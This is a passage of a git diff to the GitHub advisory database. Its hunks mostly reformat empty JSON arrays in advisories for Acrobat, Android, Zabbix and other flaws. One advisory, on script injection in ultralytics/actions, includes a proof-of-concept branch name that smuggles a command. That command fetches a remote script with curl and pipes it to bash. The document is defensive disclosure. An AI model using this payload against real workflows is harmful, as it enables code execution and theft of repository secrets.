diff --git a/advisories/github-reviewed/2022/05/GHSA-gvgc-rxmh-5hvw/GHSA-gvgc-rxmh-5hvw.json b/advisories/github-reviewed/2022/05/GHSA-gvgc-rxmh-5hvw/GHSA-gvgc-rxmh-5hvw.json index b88c5af4dc3..e0e8d035545 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gvgc-rxmh-5hvw/GHSA-gvgc-rxmh-5hvw.json +++ b/advisories/github-reviewed/2022/05/GHSA-gvgc-rxmh-5hvw/GHSA-gvgc-rxmh-5hvw.json @@ -8,9 +8,7 @@ ], "summary": "Apache Tomcat affected by infinite loop in Double.parseDouble method in Java Runtime Environment", "details": "The `Double.parseDouble` method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.\n\nApache Tomcat introduced workarounds to avoid being affected by this issue in versions 7.0.7, 6.0.32, and 5.5.33.", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { @@ -313,9 +311,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-02-27T21:57:19Z", diff --git a/advisories/github-reviewed/2022/06/GHSA-q874-g24w-4q9g/GHSA-q874-g24w-4q9g.json b/advisories/github-reviewed/2022/06/GHSA-q874-g24w-4q9g/GHSA-q874-g24w-4q9g.json index 63028a3d705..2caeb1bf042 100644 --- a/advisories/github-reviewed/2022/06/GHSA-q874-g24w-4q9g/GHSA-q874-g24w-4q9g.json +++ b/advisories/github-reviewed/2022/06/GHSA-q874-g24w-4q9g/GHSA-q874-g24w-4q9g.json @@ -84,9 +84,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-06-16T23:13:57Z", diff --git a/advisories/github-reviewed/2024/08/GHSA-7x29-qqmq-v6qc/GHSA-7x29-qqmq-v6qc.json b/advisories/github-reviewed/2024/08/GHSA-7x29-qqmq-v6qc/GHSA-7x29-qqmq-v6qc.json index a47763e2406..f4bd0ea6798 100644 --- a/advisories/github-reviewed/2024/08/GHSA-7x29-qqmq-v6qc/GHSA-7x29-qqmq-v6qc.json +++ b/advisories/github-reviewed/2024/08/GHSA-7x29-qqmq-v6qc/GHSA-7x29-qqmq-v6qc.json @@ -3,9 +3,7 @@ "id": "GHSA-7x29-qqmq-v6qc", "modified": "2024-11-18T16:27:04Z", "published": "2024-08-14T20:53:47Z", - "aliases": [ - - ], + "aliases": [], "summary": "GitHub Actions Script Injection in `ultralytics/actions`", "details": "### Summary\n\nThe Ultralytics action available at https://github.com/marketplace/actions/ultralytics-actions is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the `pull_request_target` trigger, then an attacker can inject arbitrary code into that workflow using a crafted branch name.\n\n### Details\n\nThe issue exists because the `action.yml` is a composite action and uses certain fields by GitHub context expression within a `run` step:\n\n```\n echo \"github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}\"\n echo \"github.ref: ${{ github.ref }}\"\n echo \"github.head_ref: ${{ github.head_ref }}\"\n echo \"github.base_ref: ${{ github.base_ref }}\"\n```\n\nIn this case, `github.head_ref` and `github.event.pull_request.head.ref` are user controlled and can be used to inject code.\n\n### PoC\n\n1. Create a fork of any repository that uses `ultralytics/actions` within a workflow that runs on `pull_request_target`.\n2. In the fork create a branch as an injection payload, e.g.: `Hacked\";{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/6dc549d083b2da1a54d22cc4feac53a4/raw/4b7499772c53085aeedf459d822aee277b5f17a0/poc.sh}${IFS}|${IFS}bash`\n\n3. Create a draft pull request.\n4. If the action is reachable, then achieve arbitrary code execution.\n\n![ultra_cve_poc](https://github.com/ultralytics/actions/assets/2006441/b865a54c-38b5-451c-8e93-c497ad6874a2)\n\nSee my full POC here (https://github.com/AdnaneKhan/Ultralytics_POC/actions/runs/9733997201 and https://github.com/AdnaneKhan/Ultralytics_POC), where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.\n\n### Impact\n\nAny workflow that uses the action and runs on `pull_request_target` is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse the `GITHUB_TOKEN` or steal secrets from the workflow.\n\n### Fix\n\nSanitize the user-controlled variables using environment vars.", "severity": [ diff --git a/advisories/github-reviewed/2024/08/GHSA-rhm7-7469-rcpw/GHSA-rhm7-7469-rcpw.json b/advisories/github-reviewed/2024/08/GHSA-rhm7-7469-rcpw/GHSA-rhm7-7469-rcpw.json index b1c0d85fd0e..6b36b874db7 100644 --- a/advisories/github-reviewed/2024/08/GHSA-rhm7-7469-rcpw/GHSA-rhm7-7469-rcpw.json +++ b/advisories/github-reviewed/2024/08/GHSA-rhm7-7469-rcpw/GHSA-rhm7-7469-rcpw.json @@ -8,9 +8,7 @@ ], "summary": "Persistent Cross-site Scripting in eZ Platform Rich Text Field Type", "details": "### Impact\nThe validator for the RichText fieldtype blocklists `javascript:` and `vbscript:` in links to prevent XSS. This can leave other options open, and the check can be circumvented using upper case. Content editing permissions for RichText content is required to exploit this vulnerability, which typically means Editor role or higher. The fix implements an allowlist instead, which allows only approved link protocols. The new check is case insensitive.\n\n### Patches\n- See \"Patched versions\".\n- https://github.com/ezsystems/ezplatform-richtext/commit/6131975108fa9756e17043e7a06a4e72f786f842 (and follow-ups https://github.com/ezsystems/ezplatform-richtext/commit/8b75c603dfd1ad6f6f3db15ae2324876683cbaf9 and https://github.com/ezsystems/ezplatform-richtext/commit/7bbc6d024c6146d1e1ba84d27a3ebffe9459613e and https://github.com/ezsystems/ezplatform-richtext/commit/2c652915625c47b493a2be06924f4c87d1df7d8e and https://github.com/ezsystems/ezplatform-richtext/commit/dbe816f3ff4c903cc508dfdcdca8791c8284d292)\n\n### Workarounds\nNone.\n\n### References\n- Same issue in v4.6: https://github.com/ibexa/fieldtype-richtext/security/advisories/GHSA-hvcf-6324-cjh7\n- Ibexa advisory: https://developers.ibexa.co/security-advisories/ibexa-sa-2024-005-persistent-xss-in-richtext\n\n### Credit\nThis vulnerability was discovered and reported to Ibexa by Alec Romano: https://github.com/4rdr\nWe thank them for reporting it responsibly to us.\n\nHow to report security issues:\nhttps://doc.ibexa.co/en/latest/infrastructure_and_maintenance/security/reporting_issues/", - "severity": [ - - ], + "severity": [], "affected": [ { "package": { diff --git a/advisories/unreviewed/2022/01/GHSA-2jfj-wx9v-pw5h/GHSA-2jfj-wx9v-pw5h.json b/advisories/unreviewed/2022/01/GHSA-2jfj-wx9v-pw5h/GHSA-2jfj-wx9v-pw5h.json index af68e1e3207..d39f814cb8c 100644 --- a/advisories/unreviewed/2022/01/GHSA-2jfj-wx9v-pw5h/GHSA-2jfj-wx9v-pw5h.json +++ b/advisories/unreviewed/2022/01/GHSA-2jfj-wx9v-pw5h/GHSA-2jfj-wx9v-pw5h.json @@ -7,12 +7,8 @@ "CVE-2021-44715" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-2q59-h5qr-8vqm/GHSA-2q59-h5qr-8vqm.json b/advisories/unreviewed/2022/01/GHSA-2q59-h5qr-8vqm/GHSA-2q59-h5qr-8vqm.json index 5257865863a..9540ec9a72c 100644 --- a/advisories/unreviewed/2022/01/GHSA-2q59-h5qr-8vqm/GHSA-2q59-h5qr-8vqm.json +++ b/advisories/unreviewed/2022/01/GHSA-2q59-h5qr-8vqm/GHSA-2q59-h5qr-8vqm.json @@ -7,12 +7,8 @@ "CVE-2021-44739" ], "details": "Acrobat Reader DC ActiveX Control versions 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Information Disclosure vulnerability. An unauthenticated attacker could leverage this vulnerability to obtain NTLMv2 credentials. Exploitation of this issue requires user interaction in that a victim must open a maliciously crafted Microsoft Office file, or visit an attacker controlled web page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-2r84-x97c-3ch4/GHSA-2r84-x97c-3ch4.json b/advisories/unreviewed/2022/01/GHSA-2r84-x97c-3ch4/GHSA-2r84-x97c-3ch4.json index feaab64f8cb..774dc2d9aab 100644 --- a/advisories/unreviewed/2022/01/GHSA-2r84-x97c-3ch4/GHSA-2r84-x97c-3ch4.json +++ b/advisories/unreviewed/2022/01/GHSA-2r84-x97c-3ch4/GHSA-2r84-x97c-3ch4.json @@ -7,12 +7,8 @@ "CVE-2022-23133" ], "details": "An authenticated user can create a hosts group from the configuration with XSS payload, which will be available for other users. When XSS is stored by an authenticated malicious actor and other users try to search for groups during new host creation, the XSS payload will fire and the actor can steal session cookies and perform session hijacking to impersonate users or take over their accounts.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-34gv-wgxf-mrpx/GHSA-34gv-wgxf-mrpx.json b/advisories/unreviewed/2022/01/GHSA-34gv-wgxf-mrpx/GHSA-34gv-wgxf-mrpx.json index 7a76d07aab9..f2bae4d3b7b 100644 --- a/advisories/unreviewed/2022/01/GHSA-34gv-wgxf-mrpx/GHSA-34gv-wgxf-mrpx.json +++ b/advisories/unreviewed/2022/01/GHSA-34gv-wgxf-mrpx/GHSA-34gv-wgxf-mrpx.json @@ -7,12 +7,8 @@ "CVE-2021-40573" ], "details": "The binary MP4Box in Gpac 1.0.1 has a double-free vulnerability in the gf_list_del function in list.c, which allows attackers to cause a denial of service.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-3683-8rfr-7vwg/GHSA-3683-8rfr-7vwg.json b/advisories/unreviewed/2022/01/GHSA-3683-8rfr-7vwg/GHSA-3683-8rfr-7vwg.json index e28ca0a0c85..f8f58418ba3 100644 --- a/advisories/unreviewed/2022/01/GHSA-3683-8rfr-7vwg/GHSA-3683-8rfr-7vwg.json +++ b/advisories/unreviewed/2022/01/GHSA-3683-8rfr-7vwg/GHSA-3683-8rfr-7vwg.json @@ -7,12 +7,8 @@ "CVE-2021-44709" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a heap overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-36fw-cxfr-92fm/GHSA-36fw-cxfr-92fm.json b/advisories/unreviewed/2022/01/GHSA-36fw-cxfr-92fm/GHSA-36fw-cxfr-92fm.json index e340baad07e..0266682a42f 100644 --- a/advisories/unreviewed/2022/01/GHSA-36fw-cxfr-92fm/GHSA-36fw-cxfr-92fm.json +++ b/advisories/unreviewed/2022/01/GHSA-36fw-cxfr-92fm/GHSA-36fw-cxfr-92fm.json @@ -7,12 +7,8 @@ "CVE-2021-39632" ], "details": "In inotify_cb of events.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-202159709", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-38mp-p2g2-47gf/GHSA-38mp-p2g2-47gf.json b/advisories/unreviewed/2022/01/GHSA-38mp-p2g2-47gf/GHSA-38mp-p2g2-47gf.json index 78e497b5f0d..32b4dba5bc9 100644 --- a/advisories/unreviewed/2022/01/GHSA-38mp-p2g2-47gf/GHSA-38mp-p2g2-47gf.json +++ b/advisories/unreviewed/2022/01/GHSA-38mp-p2g2-47gf/GHSA-38mp-p2g2-47gf.json @@ -7,12 +7,8 @@ "CVE-2021-39659" ], "details": "In sortSimPhoneAccountsForEmergency of CreateConnectionProcessor.java, there is a possible prevention of access to emergency calling due to an unhandled exception. In rare instances, this could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-208267659", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-3g75-33pv-7298/GHSA-3g75-33pv-7298.json b/advisories/unreviewed/2022/01/GHSA-3g75-33pv-7298/GHSA-3g75-33pv-7298.json index d23bd3b0071..615cf4ecf5b 100644 --- a/advisories/unreviewed/2022/01/GHSA-3g75-33pv-7298/GHSA-3g75-33pv-7298.json +++ b/advisories/unreviewed/2022/01/GHSA-3g75-33pv-7298/GHSA-3g75-33pv-7298.json @@ -7,12 +7,8 @@ "CVE-2021-39626" ], "details": "In onAttach of ConnectedDeviceDashboardFragment.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege in Bluetooth settings with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-194695497", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-3g85-r6x7-j7mx/GHSA-3g85-r6x7-j7mx.json b/advisories/unreviewed/2022/01/GHSA-3g85-r6x7-j7mx/GHSA-3g85-r6x7-j7mx.json index 653fcafbf83..7e45d3a72a3 100644 --- a/advisories/unreviewed/2022/01/GHSA-3g85-r6x7-j7mx/GHSA-3g85-r6x7-j7mx.json +++ b/advisories/unreviewed/2022/01/GHSA-3g85-r6x7-j7mx/GHSA-3g85-r6x7-j7mx.json @@ -7,12 +7,8 @@ "CVE-2022-22125" ], "details": "In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the article tag. An authenticated admin attacker can inject arbitrary javascript code that will execute on a victim’s server.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-3xgw-mp56-cmcq/GHSA-3xgw-mp56-cmcq.json b/advisories/unreviewed/2022/01/GHSA-3xgw-mp56-cmcq/GHSA-3xgw-mp56-cmcq.json index a026bd810b8..d0318e8212a 100644 --- a/advisories/unreviewed/2022/01/GHSA-3xgw-mp56-cmcq/GHSA-3xgw-mp56-cmcq.json +++ b/advisories/unreviewed/2022/01/GHSA-3xgw-mp56-cmcq/GHSA-3xgw-mp56-cmcq.json @@ -7,12 +7,8 @@ "CVE-2022-22112" ], "details": "In DayByDay CRM, versions 1.1 through 2.2.1 (latest) suffer from an application-wide Client-Side Template Injection (CSTI). A low privileged attacker can input template injection payloads in the application at various locations to execute JavaScript on the client browser.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-44hh-fw35-89r5/GHSA-44hh-fw35-89r5.json b/advisories/unreviewed/2022/01/GHSA-44hh-fw35-89r5/GHSA-44hh-fw35-89r5.json index 32fc7f8a832..321de6e09e6 100644 --- a/advisories/unreviewed/2022/01/GHSA-44hh-fw35-89r5/GHSA-44hh-fw35-89r5.json +++ b/advisories/unreviewed/2022/01/GHSA-44hh-fw35-89r5/GHSA-44hh-fw35-89r5.json @@ -7,12 +7,8 @@ "CVE-2021-43752" ], "details": "Adobe Illustrator versions 25.4.2 (and earlier) and 26.0.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-44hw-r4f7-47v7/GHSA-44hw-r4f7-47v7.json b/advisories/unreviewed/2022/01/GHSA-44hw-r4f7-47v7/GHSA-44hw-r4f7-47v7.json index fa378db5c1d..55024e01785 100644 --- a/advisories/unreviewed/2022/01/GHSA-44hw-r4f7-47v7/GHSA-44hw-r4f7-47v7.json +++ b/advisories/unreviewed/2022/01/GHSA-44hw-r4f7-47v7/GHSA-44hw-r4f7-47v7.json @@ -7,12 +7,8 @@ "CVE-2021-39679" ], "details": "In init of vendor_graphicbuffer_meta.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-188745089References: N/A", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-48jx-388g-hcw7/GHSA-48jx-388g-hcw7.json b/advisories/unreviewed/2022/01/GHSA-48jx-388g-hcw7/GHSA-48jx-388g-hcw7.json index cc3dbf5750b..24a7225d8a8 100644 --- a/advisories/unreviewed/2022/01/GHSA-48jx-388g-hcw7/GHSA-48jx-388g-hcw7.json +++ b/advisories/unreviewed/2022/01/GHSA-48jx-388g-hcw7/GHSA-48jx-388g-hcw7.json @@ -7,12 +7,8 @@ "CVE-2021-44703" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a stack buffer overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-4f47-65f7-v2g8/GHSA-4f47-65f7-v2g8.json b/advisories/unreviewed/2022/01/GHSA-4f47-65f7-v2g8/GHSA-4f47-65f7-v2g8.json index e869f02e77d..1afd6e21aea 100644 --- a/advisories/unreviewed/2022/01/GHSA-4f47-65f7-v2g8/GHSA-4f47-65f7-v2g8.json +++ b/advisories/unreviewed/2022/01/GHSA-4f47-65f7-v2g8/GHSA-4f47-65f7-v2g8.json @@ -7,12 +7,8 @@ "CVE-2021-39629" ], "details": "In phTmlNfc_Init and phTmlNfc_CleanUp of phTmlNfc.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-197353344", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-4g3c-wg65-3h9j/GHSA-4g3c-wg65-3h9j.json b/advisories/unreviewed/2022/01/GHSA-4g3c-wg65-3h9j/GHSA-4g3c-wg65-3h9j.json index ad3381e9415..43e3924888f 100644 --- a/advisories/unreviewed/2022/01/GHSA-4g3c-wg65-3h9j/GHSA-4g3c-wg65-3h9j.json +++ b/advisories/unreviewed/2022/01/GHSA-4g3c-wg65-3h9j/GHSA-4g3c-wg65-3h9j.json @@ -7,12 +7,8 @@ "CVE-2021-46169" ], "details": "Modex v2.11 was discovered to contain an Use-After-Free vulnerability via the component tcache.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-4g73-3mxf-j47w/GHSA-4g73-3mxf-j47w.json b/advisories/unreviewed/2022/01/GHSA-4g73-3mxf-j47w/GHSA-4g73-3mxf-j47w.json index dfda0d1e529..7cfc03e57b5 100644 --- a/advisories/unreviewed/2022/01/GHSA-4g73-3mxf-j47w/GHSA-4g73-3mxf-j47w.json +++ b/advisories/unreviewed/2022/01/GHSA-4g73-3mxf-j47w/GHSA-4g73-3mxf-j47w.json @@ -7,12 +7,8 @@ "CVE-2022-23131" ], "details": "In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of Zabbix user (or use the guest account, which is disabled by default).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-4jw8-gq5q-vrq4/GHSA-4jw8-gq5q-vrq4.json b/advisories/unreviewed/2022/01/GHSA-4jw8-gq5q-vrq4/GHSA-4jw8-gq5q-vrq4.json index de256f59e88..7714bc5dc29 100644 --- a/advisories/unreviewed/2022/01/GHSA-4jw8-gq5q-vrq4/GHSA-4jw8-gq5q-vrq4.json +++ b/advisories/unreviewed/2022/01/GHSA-4jw8-gq5q-vrq4/GHSA-4jw8-gq5q-vrq4.json @@ -7,12 +7,8 @@ "CVE-2021-44708" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a heap overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-4vjj-3gxh-fm7h/GHSA-4vjj-3gxh-fm7h.json b/advisories/unreviewed/2022/01/GHSA-4vjj-3gxh-fm7h/GHSA-4vjj-3gxh-fm7h.json index 3074795638f..00e7b15679e 100644 --- a/advisories/unreviewed/2022/01/GHSA-4vjj-3gxh-fm7h/GHSA-4vjj-3gxh-fm7h.json +++ b/advisories/unreviewed/2022/01/GHSA-4vjj-3gxh-fm7h/GHSA-4vjj-3gxh-fm7h.json @@ -7,12 +7,8 @@ "CVE-2021-44742" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-52w9-4w5g-hqxc/GHSA-52w9-4w5g-hqxc.json b/advisories/unreviewed/2022/01/GHSA-52w9-4w5g-hqxc/GHSA-52w9-4w5g-hqxc.json index 796991abf67..8666166b268 100644 --- a/advisories/unreviewed/2022/01/GHSA-52w9-4w5g-hqxc/GHSA-52w9-4w5g-hqxc.json +++ b/advisories/unreviewed/2022/01/GHSA-52w9-4w5g-hqxc/GHSA-52w9-4w5g-hqxc.json @@ -7,12 +7,8 @@ "CVE-2021-39056" ], "details": "The IBM i 7.1, 7.2, 7.3, and 7.4 Extended Dynamic Remote SQL server (EDRSQL) could allow a remote authenticated user to send a specially crafted request and cause a denial of service. IBM X-Force ID: 214537.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-54px-hxcr-mv7h/GHSA-54px-hxcr-mv7h.json b/advisories/unreviewed/2022/01/GHSA-54px-hxcr-mv7h/GHSA-54px-hxcr-mv7h.json index c18516ef8ea..d8a8ec2da75 100644 --- a/advisories/unreviewed/2022/01/GHSA-54px-hxcr-mv7h/GHSA-54px-hxcr-mv7h.json +++ b/advisories/unreviewed/2022/01/GHSA-54px-hxcr-mv7h/GHSA-54px-hxcr-mv7h.json @@ -7,12 +7,8 @@ "CVE-2021-46168" ], "details": "Spin v6.5.1 was discovered to contain an out-of-bounds write in lex() at spinlex.c.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-5g39-42r3-hp8f/GHSA-5g39-42r3-hp8f.json b/advisories/unreviewed/2022/01/GHSA-5g39-42r3-hp8f/GHSA-5g39-42r3-hp8f.json index fbec76ee053..4e9a7fa9df3 100644 --- a/advisories/unreviewed/2022/01/GHSA-5g39-42r3-hp8f/GHSA-5g39-42r3-hp8f.json +++ b/advisories/unreviewed/2022/01/GHSA-5g39-42r3-hp8f/GHSA-5g39-42r3-hp8f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-66cp-6j7w-r93f/GHSA-66cp-6j7w-r93f.json b/advisories/unreviewed/2022/01/GHSA-66cp-6j7w-r93f/GHSA-66cp-6j7w-r93f.json index b442d3f213e..647a98a666f 100644 --- a/advisories/unreviewed/2022/01/GHSA-66cp-6j7w-r93f/GHSA-66cp-6j7w-r93f.json +++ b/advisories/unreviewed/2022/01/GHSA-66cp-6j7w-r93f/GHSA-66cp-6j7w-r93f.json @@ -7,12 +7,8 @@ "CVE-2022-22123" ], "details": "In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the article title. An authenticated attacker can inject arbitrary javascript code that will execute on a victim’s server.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-6jfc-jv5m-vxv3/GHSA-6jfc-jv5m-vxv3.json b/advisories/unreviewed/2022/01/GHSA-6jfc-jv5m-vxv3/GHSA-6jfc-jv5m-vxv3.json index 484f8bcecf1..551a3377401 100644 --- a/advisories/unreviewed/2022/01/GHSA-6jfc-jv5m-vxv3/GHSA-6jfc-jv5m-vxv3.json +++ b/advisories/unreviewed/2022/01/GHSA-6jfc-jv5m-vxv3/GHSA-6jfc-jv5m-vxv3.json @@ -7,12 +7,8 @@ "CVE-2021-39680" ], "details": "In sec_SHA256_Transform of sha256_core.c, there is a possible way to read heap data due to uninitialized data. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-197965864References: N/A", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-6rch-r3vh-4957/GHSA-6rch-r3vh-4957.json b/advisories/unreviewed/2022/01/GHSA-6rch-r3vh-4957/GHSA-6rch-r3vh-4957.json index 5e67ba74378..567e428d3c5 100644 --- a/advisories/unreviewed/2022/01/GHSA-6rch-r3vh-4957/GHSA-6rch-r3vh-4957.json +++ b/advisories/unreviewed/2022/01/GHSA-6rch-r3vh-4957/GHSA-6rch-r3vh-4957.json @@ -7,12 +7,8 @@ "CVE-2021-45775" ], "details": "GNU Inetutils 2.2.16-cf091 was discovered to contain an infinite loop in domacro at domacro.c.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/01/GHSA-6xrh-c7j6-5776/GHSA-6xrh-c7j6-5776.json b/advisories/unreviewed/2022/01/GHSA-6xrh-c7j6-5776/GHSA-6xrh-c7j6-5776.json index 590196df51c..fd68839679f 100644 --- a/advisories/unreviewed/2022/01/GHSA-6xrh-c7j6-5776/GHSA-6xrh-c7j6-5776.json +++ b/advisories/unreviewed/2022/01/GHSA-6xrh-c7j6-5776/GHSA-6xrh-c7j6-5776.json @@ -7,12 +7,8 @@ "CVE-2021-44710" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-794h-h94v-fq9w/GHSA-794h-h94v-fq9w.json b/advisories/unreviewed/2022/01/GHSA-794h-h94v-fq9w/GHSA-794h-h94v-fq9w.json index 524d5bfcb5f..17a67010706 100644 --- a/advisories/unreviewed/2022/01/GHSA-794h-h94v-fq9w/GHSA-794h-h94v-fq9w.json +++ b/advisories/unreviewed/2022/01/GHSA-794h-h94v-fq9w/GHSA-794h-h94v-fq9w.json @@ -7,12 +7,8 @@ "CVE-2021-44743" ], "details": "Adobe Bridge version 11.1.2 (and earlier) and version 12.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 